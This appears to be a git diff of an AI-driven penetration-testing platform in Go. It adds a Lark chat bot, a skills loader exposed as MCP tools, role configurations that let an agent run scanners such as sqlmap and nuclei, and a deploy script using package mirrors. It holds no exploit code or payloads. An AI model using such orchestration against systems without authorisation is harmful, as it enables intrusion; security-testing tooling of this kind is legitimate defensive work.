if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" {
return
}
go runLarkLoop(ctx, cfg, h, logger)
}
// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。
func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, h MessageHandler, logger *zap.Logger) {
backoff := larkReconnectInitial
for {
larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret)
eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
go handleLarkMessage(ctx, event, h, larkClient, logger)
return nil
})
wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret,
larkws.WithEventHandler(eventHandler),
larkws.WithLogLevel(larkcore.LogLevelInfo),
)
logger.Info("飞书长连接正在连接…", zap.String("app_id", cfg.AppID))
err := wsClient.Start(ctx)
if ctx.Err() != nil {
logger.Info("飞书长连接已按配置重启关闭")
return
}
if err != nil {
logger.Warn("飞书长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
}
select {
case <-ctx.Done():
return
case <-time.After(backoff):
if backoff < larkReconnectMax {
backoff *= 2
if backoff > larkReconnectMax {
backoff = larkReconnectMax
}
}
}
}
}
func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, h MessageHandler, client *lark.Client, logger *zap.Logger) {
if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
return
}
msg := event.Event.Message
msgType := larkcore.StringValue(msg.MessageType)
if msgType != larkim.MsgTypeText {
logger.Debug("飞书暂仅处理文本消息", zap.String("msg_type", msgType))
return
}
var textBody larkTextContent
if err := json.Unmarshal([]byte(larkcore.StringValue(msg.Content)), &textBody); err != nil {
logger.Warn("飞书消息 Content 解析失败", zap.Error(err))
return
}
text := strings.TrimSpace(textBody.Text)
if text == "" {
return
}
userID := ""
if event.Event.Sender.SenderId.UserId != nil {
userID = *event.Event.Sender.SenderId.UserId
}
messageID := larkcore.StringValue(msg.MessageId)
reply := h.HandleMessage("lark", userID, text)
contentBytes, _ := json.Marshal(larkTextContent{Text: reply})
_, err := client.Im.Message.Reply(ctx, larkim.NewReplyMessageReqBuilder().
MessageId(messageID).
Body(larkim.NewReplyMessageReqBodyBuilder().
MsgType(larkim.MsgTypeText).
Content(string(contentBytes)).
Build()).
Build())
if err != nil {
logger.Warn("飞书回复失败", zap.String("message_id", messageID), zap.Error(err))
return
}
logger.Debug("飞书已回复", zap.String("message_id", messageID))
}
+43 -8
View File
@@ -224,22 +224,25 @@ func (e *Executor) RegisterTools(mcpServer *mcp.Server) {
toolName := toolConfig.Name
toolConfigCopy := toolConfig
// 使用简短描述(如果存在),否则使用详细描述的前100个字符
// 根据配置决定暴露给 AI/API 的描述:short_description 或 description
useFullDescription := strings.TrimSpace(strings.ToLower(e.config.ToolDescriptionMode)) == "full"
shortDesc := toolConfigCopy.ShortDescription
if shortDesc == "" {
// 如果没有简短描述,从详细描述中提取第一行或前100个字符
// 如果没有简短描述,从详细描述中提取第一行或前10000个字符
desc := toolConfigCopy.Description
if len(desc) > 100 {
// 尝试找到第一个换行符
if idx := strings.Index(desc, "\n"); idx > 0 && idx < 100 {
if len(desc) > 10000 {
if idx := strings.Index(desc, "\n"); idx > 0 && idx < 10000 {
shortDesc = strings.TrimSpace(desc[:idx])
} else {
shortDesc = desc[:100] + "..."
shortDesc = desc[:10000] + "..."
}
} else {
shortDesc = desc
}
}
if useFullDescription {
shortDesc = "" // 使用 description 时清空 ShortDescription,下游会回退到 Description
}
tool := mcp.Tool{
Name: toolConfigCopy.Name,
@@ -303,7 +306,23 @@ func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConf
}
}
// 先处理标志参数(对于大多数命令,标志应该在位置参数之前
// 对于需要子命令的工具(如 gobuster dir),position 0 必须紧跟在命令名后、所有 flag 之前
for _, param := range positionalParams {
if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" {
continue
}
if param.Position != nil && *param.Position == 0 {
value := e.getParamValue(args, param)
if value == nil && param.Default != nil {
value = param.Default
}
if value != nil {
cmdArgs = append(cmdArgs, e.formatParamValue(param, value))
}
break
}
}
// 处理标志参数
for _, param := range flagParams {
// 跳过特殊参数,它们会在后面单独处理
@@ -416,7 +435,11 @@ func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConf
}
// 按位置顺序处理参数,确保即使某些位置没有参数或使用默认值,也能正确传递
// position 0 已在前面插入(子命令优先),此处从 1 开始
for i := 0; i <= maxPosition; i++ {
if i == 0 {
continue
}
for _, param := range positionalParams {
// 跳过特殊参数,它们会在后面单独处理
// action 参数仅用于工具内部逻辑,不传递给命令
@@ -1190,7 +1213,15 @@ func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]in
required := []string{}
for _, param := range toolConfig.Parameters {
// 转换类型为OpenAI/JSON Schema标准类型
// 跳过 name 为空的参数(避免 YAML 中 name: null 或空导致非法 schema
if strings.TrimSpace(param.Name) == "" {
e.logger.Debug("跳过无名称的参数",
zap.String("tool", toolConfig.Name),
zap.String("type", param.Type),
)
continue
}
// 转换类型为OpenAI/JSON Schema标准类型(空类型默认为 string)
openAIType := e.convertToOpenAIType(param.Type)
prop := map[string]interface{}{
@@ -1232,6 +1263,10 @@ func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]in
// convertToOpenAIType 将配置中的类型转换为OpenAI/JSON Schema标准类型
func (e *Executor) convertToOpenAIType(configType string) string {
// 空或 null 类型统一视为 string,避免非法 schema 导致工具调用失败
if strings.TrimSpace(configType) == "" {
return "string"
}
switch configType {
case "bool":
return "boolean"
+239
View File
@@ -0,0 +1,239 @@
package skills
import (
"fmt"
"os"
"path/filepath"
"strings"
"sync"
"go.uber.org/zap"
)
// Manager Skills管理器
type Manager struct {
skillsDir string
logger *zap.Logger
skills map[string]*Skill // 缓存已加载的skills
mu sync.RWMutex // 保护skills map的并发访问
}
// Skill Skill定义
type Skill struct {
Name string // Skill名称
Description string // Skill描述
Content string // Skill内容(从SKILL.md中提取)
Path string // Skill路径
}
// NewManager 创建新的Skills管理器
func NewManager(skillsDir string, logger *zap.Logger) *Manager {
return &Manager{
skillsDir: skillsDir,
logger: logger,
skills: make(map[string]*Skill),
}
}
// LoadSkill 加载单个skill
func (m *Manager) LoadSkill(skillName string) (*Skill, error) {
// 先尝试读锁检查缓存
m.mu.RLock()
if skill, exists := m.skills[skillName]; exists {
m.mu.RUnlock()
return skill, nil
}
m.mu.RUnlock()
// 构建skill路径
skillPath := filepath.Join(m.skillsDir, skillName)
// 检查目录是否存在
if _, err := os.Stat(skillPath); os.IsNotExist(err) {
return nil, fmt.Errorf("skill %s not found", skillName)
}
// 查找SKILL.md文件
skillFile := filepath.Join(skillPath, "SKILL.md")
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
// 尝试其他可能的文件名
alternatives := []string{
filepath.Join(skillPath, "skill.md"),
filepath.Join(skillPath, "README.md"),
filepath.Join(skillPath, "readme.md"),
}
found := false
for _, alt := range alternatives {
if _, err := os.Stat(alt); err == nil {
skillFile = alt
found = true
break
}
}
if !found {
return nil, fmt.Errorf("skill file not found for %s", skillName)
}
}
// 读取skill文件
content, err := os.ReadFile(skillFile)
if err != nil {
return nil, fmt.Errorf("failed to read skill file: %w", err)
}
// 解析skill内容
skill := m.parseSkillContent(string(content), skillName, skillPath)
// 使用写锁缓存skill(双重检查,避免重复加载)
m.mu.Lock()
// 再次检查,可能其他goroutine已经加载了
if existing, exists := m.skills[skillName]; exists {
m.mu.Unlock()
return existing, nil
}
m.skills[skillName] = skill
m.mu.Unlock()
return skill, nil
}
// LoadSkills 批量加载skills
func (m *Manager) LoadSkills(skillNames []string) ([]*Skill, error) {
var skills []*Skill
var errors []string
for _, name := range skillNames {
skill, err := m.LoadSkill(name)
if err != nil {
errors = append(errors, fmt.Sprintf("failed to load skill %s: %v", name, err))
m.logger.Warn("加载skill失败", zap.String("skill", name), zap.Error(err))
continue
}
skills = append(skills, skill)
}
if len(errors) > 0 && len(skills) == 0 {
return nil, fmt.Errorf("failed to load any skills: %s", strings.Join(errors, "; "))
}
return skills, nil
}
// ListSkills 列出所有可用的skills
func (m *Manager) ListSkills() ([]string, error) {
if _, err := os.Stat(m.skillsDir); os.IsNotExist(err) {
return []string{}, nil
}
entries, err := os.ReadDir(m.skillsDir)
if err != nil {
return nil, fmt.Errorf("failed to read skills directory: %w", err)
}
var skills []string
for _, entry := range entries {
if !entry.IsDir() {
continue
}
skillName := entry.Name()
// 检查是否有SKILL.md文件
skillFile := filepath.Join(m.skillsDir, skillName, "SKILL.md")
if _, err := os.Stat(skillFile); err == nil {
skills = append(skills, skillName)
continue
}
// 尝试其他可能的文件名
alternatives := []string{
filepath.Join(m.skillsDir, skillName, "skill.md"),
filepath.Join(m.skillsDir, skillName, "README.md"),
filepath.Join(m.skillsDir, skillName, "readme.md"),
}
for _, alt := range alternatives {
if _, err := os.Stat(alt); err == nil {
skills = append(skills, skillName)
break
}
}
}
return skills, nil
}
// parseSkillContent 解析skill内容
// 支持YAML front matter格式,类似goskills
func (m *Manager) parseSkillContent(content, skillName, skillPath string) *Skill {
skill := &Skill{
Name: skillName,
Path: skillPath,
}
// 检查是否有YAML front matter
if strings.HasPrefix(content, "---") {
parts := strings.SplitN(content, "---", 3)
if len(parts) >= 3 {
// 解析front matter(简单实现,只提取name和description
frontMatter := parts[1]
lines := strings.Split(frontMatter, "\n")
for _, line := range lines {
line = strings.TrimSpace(line)
if strings.HasPrefix(line, "name:") {
name := strings.TrimSpace(strings.TrimPrefix(line, "name:"))
name = strings.Trim(name, `"'"`)
if name != "" {
skill.Name = name
}
} else if strings.HasPrefix(line, "description:") {
desc := strings.TrimSpace(strings.TrimPrefix(line, "description:"))
desc = strings.Trim(desc, `"'"`)
skill.Description = desc
}
}
// 剩余部分是内容
if len(parts) == 3 {
skill.Content = strings.TrimSpace(parts[2])
}
} else {
// 没有front matter,整个内容就是skill内容
skill.Content = content
}
} else {
// 没有front matter,整个内容就是skill内容
skill.Content = content
}
// 如果内容为空,使用描述作为内容
if skill.Content == "" {
skill.Content = skill.Description
}
return skill
}
// GetSkillContent 获取skill的完整内容(用于注入到系统提示词)
func (m *Manager) GetSkillContent(skillNames []string) (string, error) {
skills, err := m.LoadSkills(skillNames)
if err != nil {
return "", err
}
if len(skills) == 0 {
return "", nil
}
var builder strings.Builder
builder.WriteString("## 可用Skills\n\n")
builder.WriteString("在执行任务前,请仔细阅读以下skills内容,这些内容包含了相关的专业知识和方法:\n\n")
for _, skill := range skills {
builder.WriteString(fmt.Sprintf("### Skill: %s\n", skill.Name))
if skill.Description != "" {
builder.WriteString(fmt.Sprintf("**描述**: %s\n\n", skill.Description))
}
builder.WriteString(skill.Content)
builder.WriteString("\n\n---\n\n")
}
return builder.String(), nil
}
+201
View File
@@ -0,0 +1,201 @@
package skills
import (
"context"
"fmt"
"strings"
"time"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin"
"go.uber.org/zap"
)
// RegisterSkillsTool 注册Skills工具到MCP服务器
func RegisterSkillsTool(
mcpServer *mcp.Server,
manager *Manager,
logger *zap.Logger,
) {
RegisterSkillsToolWithStorage(mcpServer, manager, nil, logger)
}
// RegisterSkillsToolWithStorage 注册Skills工具到MCP服务器(带存储支持)
func RegisterSkillsToolWithStorage(
mcpServer *mcp.Server,
manager *Manager,
storage SkillStatsStorage,
logger *zap.Logger,
) {
// 注册第一个工具:获取所有可用的skills列表
listSkillsTool := mcp.Tool{
Name: builtin.ToolListSkills,
Description: "获取所有可用的skills列表。Skills是专业知识文档,可以在执行任务前阅读以获取相关专业知识。使用此工具可以查看系统中所有可用的skills,然后使用read_skill工具读取特定skill的内容。",
ShortDescription: "获取所有可用的skills列表",
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{},
"required": []string{},
},
}
listSkillsHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
skills, err := manager.ListSkills()
if err != nil {
logger.Error("获取skills列表失败", zap.Error(err))
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("获取skills列表失败: %v", err),
},
},
IsError: true,
}, nil
}
if len(skills) == 0 {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "当前没有可用的skills。\n\nSkills是专业知识文档,可以在执行任务前阅读以获取相关专业知识。你可以在skills目录下创建新的skill。",
},
},
IsError: false,
}, nil
}
var result strings.Builder
result.WriteString(fmt.Sprintf("共有 %d 个可用的skills\n\n", len(skills)))
for i, skill := range skills {
result.WriteString(fmt.Sprintf("%d. %s\n", i+1, skill))
}
result.WriteString("\n使用 read_skill 工具可以读取特定skill的详细内容。\n")
result.WriteString("例如:read_skill(skill_name=\"sql-injection-testing\")")
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: result.String(),
},
},
IsError: false,
}, nil
}
mcpServer.RegisterTool(listSkillsTool, listSkillsHandler)
logger.Info("注册skills列表工具成功")
// 注册第二个工具:读取特定skill的内容
readSkillTool := mcp.Tool{
Name: builtin.ToolReadSkill,
Description: "读取指定skill的详细内容。Skills是专业知识文档,包含测试方法、工具使用、最佳实践等。在执行相关任务前,可以调用此工具读取相关skill的内容,以获取专业知识和指导。",
ShortDescription: "读取指定skill的详细内容",
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"skill_name": map[string]interface{}{
"type": "string",
"description": "要读取的skill名称(必需)。可以使用list_skills工具获取所有可用的skill名称。",
},
},
"required": []string{"skill_name"},
},
}
readSkillHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
skillName, ok := args["skill_name"].(string)
if !ok || skillName == "" {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "错误: skill_name 参数必需且不能为空。请使用list_skills工具获取所有可用的skill名称。",
},
},
IsError: true,
}, nil
}
skill, err := manager.LoadSkill(skillName)
failed := err != nil
now := time.Now()
// 记录调用统计
if storage != nil {
totalCalls := 1
successCalls := 0
failedCalls := 0
if failed {
failedCalls = 1
} else {
successCalls = 1
}
if err := storage.UpdateSkillStats(skillName, totalCalls, successCalls, failedCalls, &now); err != nil {
logger.Warn("保存Skills统计信息失败", zap.String("skill", skillName), zap.Error(err))
} else {
logger.Info("Skills统计信息已更新",
zap.String("skill", skillName),
zap.Int("totalCalls", totalCalls),
zap.Int("successCalls", successCalls),
zap.Int("failedCalls", failedCalls))
}
} else {
logger.Warn("Skills统计存储未配置,无法记录调用统计", zap.String("skill", skillName))
}
if err != nil {
logger.Warn("读取skill失败", zap.String("skill", skillName), zap.Error(err))
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("读取skill失败: %v\n\n请使用list_skills工具确认skill名称是否正确。", err),
},
},
IsError: true,
}, nil
}
var result strings.Builder
result.WriteString(fmt.Sprintf("## Skill: %s\n\n", skill.Name))
if skill.Description != "" {
result.WriteString(fmt.Sprintf("**描述**: %s\n\n", skill.Description))
}
result.WriteString("---\n\n")
result.WriteString(skill.Content)
result.WriteString("\n\n---\n\n")
result.WriteString(fmt.Sprintf("*Skill路径: %s*", skill.Path))
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: result.String(),
},
},
IsError: false,
}, nil
}
mcpServer.RegisterTool(readSkillTool, readSkillHandler)
logger.Info("注册skill读取工具成功")
}
// SkillStatsStorage Skills统计存储接口
type SkillStatsStorage interface {
UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error
LoadSkillStats() (map[string]*SkillStats, error)
}
// SkillStats Skills统计信息
type SkillStats struct {
SkillName string
TotalCalls int
SuccessCalls int
FailedCalls int
LastCallTime *time.Time
}
+4 -1
View File
@@ -5,10 +5,13 @@ charset-normalizer>=3.3.2
chardet>=5.2.0
# Python exploitation / analysis frameworks referenced by tool recipes
angr>=9.2.96
# angr>=9.2.96
# pwntools>=4.12.0
arjun>=2.2.0
uro>=1.0.2
bloodhound>=1.6.1
impacket>=0.11.0
# MCP (Model Context Protocol) SDK
mcp>=1.0.0
+2
View File
@@ -17,4 +17,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -30,4 +30,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+67
View File
@@ -0,0 +1,67 @@
# 角色配置文件说明
本目录包含所有角色配置文件,每个角色定义了AI的行为模式、可用工具和技能。
## 创建新角色
创建新角色时,请在 `roles/` 目录下创建 YAML 文件,格式如下:
**方式1:显式指定工具列表(推荐)**
```yaml
name: 角色名称
description: 角色描述
user_prompt: 用户提示词(追加到用户消息前,用于引导AI行为)
icon: "图标(可选)"
tools:
# 添加你需要的工具...
# ⚠️ 重要:建议包含以下5个内置MCP工具
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
```
**方式2:不设置tools字段(使用所有已开启的工具)**
```yaml
name: 角色名称
description: 角色描述
user_prompt: 用户提示词(追加到用户消息前,用于引导AI行为)
icon: "图标(可选)"
# 不设置tools字段,将默认使用所有MCP管理中已开启的工具
enabled: true
```
## ⚠️ 重要提醒:内置MCP工具
**如果设置了 `tools` 字段,请务必在列表中添加以下5个内置MCP工具:**
1. **`record_vulnerability`** - 漏洞管理工具,用于记录发现的漏洞
2. **`list_knowledge_risk_types`** - 知识库工具,列出可用的风险类型
3. **`search_knowledge_base`** - 知识库工具,搜索知识库内容
4. **`list_skills`** - Skills工具,列出可用的技能
5. **`read_skill`** - Skills工具,读取技能详情
这些内置工具是系统核心功能,建议所有角色都包含它们,以确保:
- 能够记录和管理发现的漏洞
- 能够访问知识库获取安全测试知识
- 能够查看和使用可用的安全测试技能
**注意**:如果不设置 `tools` 字段,系统会默认使用所有MCP管理中已开启的工具(包括这5个内置工具),但为了明确控制角色可用的工具范围,建议显式设置 `tools` 字段。
## 角色配置字段说明
- **name**: 角色名称(必填)
- **description**: 角色描述(必填)
- **user_prompt**: 用户提示词,会追加到用户消息前,用于引导AI采用特定的测试方法和关注点(可选)
- **icon**: 角色图标,支持Unicode emoji(可选)
- **tools**: 工具列表,指定该角色可用的工具(可选)
- **如果不设置 `tools` 字段**:默认会选中**全部MCP管理中已开启的工具**
- **如果设置了 `tools` 字段**:只使用列表中指定的工具(建议至少包含5个内置工具)
- **skills**: 技能列表,指定该角色关联的技能(可选)
- **enabled**: 是否启用该角色(必填,true/false)
## 示例
参考本目录下的其他角色文件,如 `渗透测试.yaml``Web应用扫描.yaml` 等。
+2
View File
@@ -22,4 +22,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -16,4 +16,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -28,4 +28,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+3 -1
View File
@@ -1,7 +1,7 @@
name: 云安全审计
description: 云安全审计专家,多云环境安全检测
user_prompt: 你是一个专业的云安全审计专家。请使用专业的云安全工具对AWS、Azure、GCP等云环境进行全面的安全审计,包括配置检查、合规性评估、权限审计、安全最佳实践验证等工作。
icon: "\U00002601"
icon:
tools:
- prowler
- scout-suite
@@ -14,4 +14,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -28,4 +28,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -20,4 +20,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -15,4 +15,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -21,4 +21,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+2
View File
@@ -30,4 +30,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+3 -1
View File
@@ -1,7 +1,7 @@
name: 综合漏洞扫描
description: 综合漏洞扫描专家,多类型漏洞检测
user_prompt: 你是一个专业的综合漏洞扫描专家。请使用各种漏洞扫描工具对目标进行全面的安全检测,包括Web漏洞、网络服务漏洞、配置缺陷等多种类型的漏洞识别和分析。
icon: "\U000026A0"
icon:
tools:
- nuclei
- nikto
@@ -20,4 +20,6 @@ tools:
- record_vulnerability
- list_knowledge_risk_types
- search_knowledge_base
- list_skills
- read_skill
enabled: true
+190 -7
View File
@@ -11,6 +11,7 @@ RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# 打印带颜色的消息
@@ -18,6 +19,47 @@ info() { echo -e "${BLUE}️ $1${NC}"; }
success() { echo -e "${GREEN}$1${NC}"; }
warning() { echo -e "${YELLOW}⚠️ $1${NC}"; }
error() { echo -e "${RED}$1${NC}"; }
note() { echo -e "${CYAN}$1${NC}"; }
# 临时源配置(仅在此脚本中生效)
PIP_INDEX_URL="${PIP_INDEX_URL:-https://pypi.tuna.tsinghua.edu.cn/simple}"
GOPROXY="${GOPROXY:-https://goproxy.cn,direct}"
# 保存原始环境变量(用于恢复)
ORIGINAL_PIP_INDEX_URL="${PIP_INDEX_URL:-}"
ORIGINAL_GOPROXY="${GOPROXY:-}"
# 进度显示函数
show_progress() {
local pid=$1
local message=$2
local i=0
local dots=""
# 检查进程是否存在
if ! kill -0 "$pid" 2>/dev/null; then
# 进程已经结束,立即返回
return 0
fi
while kill -0 "$pid" 2>/dev/null; do
i=$((i + 1))
case $((i % 4)) in
0) dots="." ;;
1) dots=".." ;;
2) dots="..." ;;
3) dots="...." ;;
esac
printf "\r${BLUE}⏳ %s%s${NC}" "$message" "$dots"
sleep 0.5
# 再次检查进程是否还存在
if ! kill -0 "$pid" 2>/dev/null; then
break
fi
done
printf "\r"
}
echo ""
echo "=========================================="
@@ -25,6 +67,19 @@ echo " CyberStrikeAI 一键部署启动脚本"
echo "=========================================="
echo ""
# 显示临时源配置信息
echo ""
warning "⚠️ 注意:此脚本将使用临时镜像源加速下载"
echo ""
info "Python pip 临时镜像源:"
echo " ${PIP_INDEX_URL}"
info "Go Proxy 临时镜像源:"
echo " ${GOPROXY}"
echo ""
note "这些设置仅在脚本运行期间生效,不会修改系统配置"
echo ""
sleep 1
CONFIG_FILE="$ROOT_DIR/config.yaml"
VENV_DIR="$ROOT_DIR/venv"
REQUIREMENTS_FILE="$ROOT_DIR/requirements.txt"
@@ -101,12 +156,55 @@ setup_python_env() {
source "$VENV_DIR/bin/activate"
if [ -f "$REQUIREMENTS_FILE" ]; then
info "安装/更新 Python 依赖..."
pip install --quiet --upgrade pip >/dev/null 2>&1 || true
echo ""
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
note "⚠️ 使用临时 pip 镜像源(仅本次脚本运行有效)"
note " 镜像地址: ${PIP_INDEX_URL}"
note " 如需永久配置,请设置环境变量 PIP_INDEX_URL"
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo ""
# 尝试安装依赖,捕获错误输出
info "升级 pip..."
pip install --index-url "$PIP_INDEX_URL" --upgrade pip >/dev/null 2>&1 || true
info "安装 Python 依赖包..."
echo ""
# 尝试安装依赖,捕获错误输出并显示进度
PIP_LOG=$(mktemp)
if pip install -r "$REQUIREMENTS_FILE" >"$PIP_LOG" 2>&1; then
(
set +e # 在子shell中禁用错误退出
pip install --index-url "$PIP_INDEX_URL" -r "$REQUIREMENTS_FILE" >"$PIP_LOG" 2>&1
echo $? > "${PIP_LOG}.exit"
) &
PIP_PID=$!
# 等待一小段时间,确保进程启动
sleep 0.1
# 显示进度(如果进程还在运行)
if kill -0 "$PIP_PID" 2>/dev/null; then
show_progress "$PIP_PID" "正在安装依赖包"
else
# 进程已经结束,等待一下确保退出码文件已写入
sleep 0.2
fi
# 等待进程完成,忽略 wait 的退出码
wait "$PIP_PID" 2>/dev/null || true
PIP_EXIT_CODE=0
if [ -f "${PIP_LOG}.exit" ]; then
PIP_EXIT_CODE=$(cat "${PIP_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${PIP_LOG}.exit" 2>/dev/null || true
else
# 如果没有退出码文件,检查日志中是否有错误
if [ -f "$PIP_LOG" ] && grep -q -i "error\|failed\|exception" "$PIP_LOG" 2>/dev/null; then
PIP_EXIT_CODE=1
fi
fi
if [ $PIP_EXIT_CODE -eq 0 ]; then
success "Python 依赖安装完成"
else
# 检查是否是 angr 安装失败(需要 Rust)
@@ -138,17 +236,102 @@ setup_python_env() {
# 构建 Go 项目
build_go_project() {
echo ""
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
note "⚠️ 使用临时 Go Proxy(仅本次脚本运行有效)"
note " Proxy 地址: ${GOPROXY}"
note " 如需永久配置,请设置环境变量 GOPROXY"
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo ""
info "下载 Go 依赖..."
go mod download >/dev/null 2>&1 || {
GO_DOWNLOAD_LOG=$(mktemp)
(
set +e # 在子shell中禁用错误退出
export GOPROXY="$GOPROXY"
go mod download >"$GO_DOWNLOAD_LOG" 2>&1
echo $? > "${GO_DOWNLOAD_LOG}.exit"
) &
GO_DOWNLOAD_PID=$!
# 等待一小段时间,确保进程启动
sleep 0.1
# 显示进度(如果进程还在运行)
if kill -0 "$GO_DOWNLOAD_PID" 2>/dev/null; then
show_progress "$GO_DOWNLOAD_PID" "正在下载 Go 依赖"
else
# 进程已经结束,等待一下确保退出码文件已写入
sleep 0.2
fi
# 等待进程完成,忽略 wait 的退出码
wait "$GO_DOWNLOAD_PID" 2>/dev/null || true
GO_DOWNLOAD_EXIT_CODE=0
if [ -f "${GO_DOWNLOAD_LOG}.exit" ]; then
GO_DOWNLOAD_EXIT_CODE=$(cat "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || true
else
# 如果没有退出码文件,检查日志中是否有错误
if [ -f "$GO_DOWNLOAD_LOG" ] && grep -q -i "error\|failed" "$GO_DOWNLOAD_LOG" 2>/dev/null; then
GO_DOWNLOAD_EXIT_CODE=1
fi
fi
rm -f "$GO_DOWNLOAD_LOG" 2>/dev/null || true
if [ $GO_DOWNLOAD_EXIT_CODE -ne 0 ]; then
error "Go 依赖下载失败"
exit 1
}
fi
success "Go 依赖下载完成"
info "构建项目..."
if go build -o "$BINARY_NAME" cmd/server/main.go 2>&1; then
GO_BUILD_LOG=$(mktemp)
(
set +e # 在子shell中禁用错误退出
export GOPROXY="$GOPROXY"
go build -o "$BINARY_NAME" cmd/server/main.go >"$GO_BUILD_LOG" 2>&1
echo $? > "${GO_BUILD_LOG}.exit"
) &
GO_BUILD_PID=$!
# 等待一小段时间,确保进程启动
sleep 0.1
# 显示进度(如果进程还在运行)
if kill -0 "$GO_BUILD_PID" 2>/dev/null; then
show_progress "$GO_BUILD_PID" "正在构建项目"
else
# 进程已经结束,等待一下确保退出码文件已写入
sleep 0.2
fi
# 等待进程完成,忽略 wait 的退出码
wait "$GO_BUILD_PID" 2>/dev/null || true
GO_BUILD_EXIT_CODE=0
if [ -f "${GO_BUILD_LOG}.exit" ]; then
GO_BUILD_EXIT_CODE=$(cat "${GO_BUILD_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${GO_BUILD_LOG}.exit" 2>/dev/null || true
else
# 如果没有退出码文件,检查日志中是否有错误
if [ -f "$GO_BUILD_LOG" ] && grep -q -i "error\|failed" "$GO_BUILD_LOG" 2>/dev/null; then
GO_BUILD_EXIT_CODE=1
fi
fi
if [ $GO_BUILD_EXIT_CODE -eq 0 ]; then
success "项目构建完成: $BINARY_NAME"
rm -f "$GO_BUILD_LOG"
else
error "项目构建失败"
# 显示构建错误
echo ""
info "构建错误详情:"
cat "$GO_BUILD_LOG" | sed 's/^/ /'
echo ""
rm -f "$GO_BUILD_LOG"
exit 1
fi
}
+124
View File
@@ -0,0 +1,124 @@
# Skills 系统使用指南
## 概述
Skills系统允许你为角色配置专业知识和技能文档。当角色执行任务时,系统会将技能名称添加到系统提示词中作为推荐提示,AI智能体可以通过 `read_skill` 工具按需获取技能的详细内容。
## Skills结构
每个skill是一个目录,包含一个`SKILL.md`文件:
```
skills/
├── sql-injection-testing/
│ └── SKILL.md
├── xss-testing/
│ └── SKILL.md
└── ...
```
## SKILL.md格式
SKILL.md文件支持YAML front matter格式(可选):
```markdown
---
name: skill-name
description: Skill的简短描述
version: 1.0.0
---
# Skill标题
这里是skill的详细内容,可以包含:
- 测试方法
- 工具使用
- 最佳实践
- 示例代码
- 等等...
```
如果不使用front matter,整个文件内容都会被作为skill内容。
## 在角色中配置Skills
在角色配置文件中添加`skills`字段:
```yaml
name: 渗透测试
description: 专业渗透测试专家
user_prompt: 你是一个专业的网络安全渗透测试专家...
tools:
- nmap
- sqlmap
- burpsuite
skills:
- sql-injection-testing
- xss-testing
enabled: true
```
`skills`字段是一个字符串数组,每个字符串是skill目录的名称。
## 工作原理
